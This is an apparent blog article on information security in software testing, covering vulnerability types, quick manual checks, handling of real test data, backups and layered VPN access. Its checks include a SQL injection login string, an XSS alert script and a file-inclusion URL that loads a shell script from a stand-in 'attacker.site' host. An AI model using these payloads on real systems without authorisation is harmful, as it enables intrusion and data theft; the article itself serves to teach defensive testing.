Best practices of information security in testing

    Introduction

    In the modern world information is the greatest value. It’s not for nothing that in the century before last the following statement appeared: “Who owns information, owns the world”, it means there will always be a desire to get confidential, unavailable to others information, even if these actions are illegal and can harm others.

    Much has changed over two centuries: collecting, storage, processing of information and even control over important processes, for example, control over Nuclear Power Plant is carried out by automated systems. But they too, in one way or another, are exposed to the errors, that were laid by their creator.

    Therefore, in order to solve problems with unauthorized access to information or with sabotage of systems work, there is a need for a separate discipline of information technology - information security.

    Information security is a set of measures aimed at protection of information and supporting infrastructure from accidental or intentional influences of a natural or artificial nature, which can cause unacceptable damage to subjects of information relations, including owners and users of information and infrastructure.

    From the point of view of information security, information has such features as:

    • confidentiality;
    • integrity;
    • availability;
    • authenticity;
    • appealability.

    Vulnerability is a drawback in a system, using it you can intentionally violate its integrity and cause incorrect work. Vulnerability can be the result of programming errors, flaws in the design of the system, unsafe passwords, viruses and other harmful programs. Some vulnerabilities are known only theoretically, but methods for using them can come out at any time.

    Test approaches

    In order to assess the vulnerability of an application, it is necessary to conduct testing by means of both internal specialists and external experts who specialize in system security testing. It is important to understand that testing is not a panacea for all problems, but an important step towards ensuring security.

    It is important that security testing should be conducted before the application is shipped, at which the following security tests should be minimally checked:

    • the correctness of the implementation of the application security functions;
    • protection against vulnerabilities relevant to the application;
    • protection against attack scenarios described in the threat model of the application.

    Types of vulnerabilities

    Depending on the tasks solved by the application, different types of vulnerabilities can be detected. Due to the recent trend of moving focus of developed applications on the web and on mobile platforms, the most common types of vulnerabilities will remain for a long time:

    • Code injections (SQL, PHP, ASP etc.) is a type of vulnerability in which it becomes possible to launch executable code in order to get access to system resources, unauthorized access to data or disable the system.

    Fast-checking.
    Let’s say we have a form for user login
    In the login field enter: my_user or 1=1);--
    In the password field enter: arbitrary characters
    The result is a SQL request type:
    SELECT * FROM usr WHERE (login='my_user' or 1=1);-- ', password='');

    If an application has a vulnerability of an SQL Injections type: authorization will occur under the first user in the table.

    • XSS (Cross-Site Scripting) is a type of attack against a web system which lies in implementation of harmful code into the page generated by the web system (which will be carried out on the user’s computer, when the user opens this page) and in the interaction of this code with the attacker’s web server.

    Fast-checking.
    One more variant of possible attack is through the login form. For this you need to enter arbitrary characters in the form in the password field, and in the login field enter:

    <script>alert('XSS');</script>

    If, sending a request, we see a pop-up window with the text: XSS, that means the vulnerability is indicated.

    • Server-Side Includes (SSI) Injection is a type of vulnerability that uses the insertion of server commands into HTML code or launching them directly from the server.

    Fast-checking.
    Let’s suppose a web application works with links similar to the following:
    http://test.site/index.php?template=news
    $body = $_GET['page']. ".php";

    During the processing of this request, index.php connects news.php script and executes the code specified in it. If you indicate http://test.site/index.php?template=http://attacker.site/phpshell as the URL and the phpshell script is successfully executed, then we can talk about the existence of the vulnerability.

    If the function of saving user documents is provided on the server, you can save the necessary script and call it through the connection function http://test.site/index.php?template=users/uploads/phpshell.

    • XSRF/CSRF (Request Forgery) is a kind of vulnerability, that allows to use HTTP protocol disadvantages.

    If a victim enters the website created by the attacker, a request under his or her name is secretly sent to another server (for example, to the server of the payment system), performing a certain operation. To carry out this attack, the victim should be authorized on the server which the request is sent to, and this request should not require any confirmation from the user, which cannot be ignored or forged by the attacking script.
    In sufficient detail, this error is discussed in the article “The vulnerability of CSRF. Introduction” https://intsystem.org/security/learn-about-csrf-intro/

    • Authorization Bypass is a type of vulnerability, when it is possible to get unauthorized access to another user’s account or documents.

    Fast-checking.
    Let’s suppose in a web application, the viewing of confidential profile information occurs at the address where the URL has an indication of a user id:
    http://test.site/index.php?profile=userId

    If after changing the userId information of another user will be displayed, then there is an error in the system.

    Due to the fact that these problems are popular, you can find a lot of information about how to detect, fix and check them. For example, in order to practice in the search for vulnerabilities, you can use free downloadable buggy web application (bWAPP). You can run it both on Windows and Linux. The application contains a large number of different vulnerabilities. To work with it, you need PHP and MySQL.

    Warning, loss or release of information

    When a tester is working, due to the characteristics of some systems, it is necessary to check the work not with abstract data, but using real data. Because of this, there may be a risk of getting information to a third party. In order to avoid such an unpleasant situation, after checking the cases, it is necessary to delete temporary data storages (including files, cookies, etc.) at the end of work with the application.
    If possible, you should try not to use the data of real users, especially when checking financial transactions. There are available services on the Internet, that help generate pseudo-real user data.
    Another important issue may be accidental or deliberate deletion of important information. At the same time, information may not affect the product in any way, but be rather difficult to recover. In this case, the best solution will be to adhere to several principles:

    1. minimize administrative privileges, use administrative accounts only when they are necessary;
    2. create backup copies of the database, configurations and so on. After all, as it is known, people are divided into two types - those, who have not yet made backup copies of data, and those, who is already making backup copies.

    Access differentiation using VPN

    In order to make the information transmitted over the network more difficult to decipher, it may be good practice to use VPN to access different network segments or to remote connection. If 2-factor authentication will be additionally used, this will add extra percentage of security, but it still will not provide 100% protection. After all, there are methods of social engineering or errors in the protocol of GSM networks.

    For example, in our case, access security had approximately the following hierarchy:

    • authorization via VPN for network access (minimum access to internal resources);
    • connection via VDI (to access to more critical resources);
    • connection via VPN inside VDI (for access to individual servers for testing).

    At the same time, if the user's password is compromised and the attacker manages to get access to necessary resources, all the performed actions will be saved and it will be possible to work out measures to minimize the damage.

    Conclusion

    Currently, software systems are so complex that it is extremely difficult to detect all errors at design and development stage. It is important to understand that there is no absolute protection, your application can be well designed and perfect in the code part, but even here an unexpected problem may appear, that depends on a third party library.

    Therefore, in practice, you can flatly state: to any system, you can find an approach and choose an attack vector that no one expects, the question is how much time and effort will be spent and is that worth it. However, this does not mean that it is necessary to ascertain the fact that all systems are vulnerable by default.

    In order to minimize risks, you need to adhere to secure software development methodologies, use proven information encryption algorithms, regularly update access keys if third-party libraries are used, check them for errors and/or regularly check for major errors and, of course, do not forget about testing.

    Useful links

    1. The project, where the most critical security problems of web applications are gathered - https://www.owasp.org/index.php/Main_Page.
    2. Penetration testing laboratory (in Russian) - https://pentestit.ru.
    3. Linux distribution for security testing - https://www.kali.org/.
    4. Article with a lot of links to the topic of internet security (in Russian) - https://habr.com/company/dsec/blog/200408/.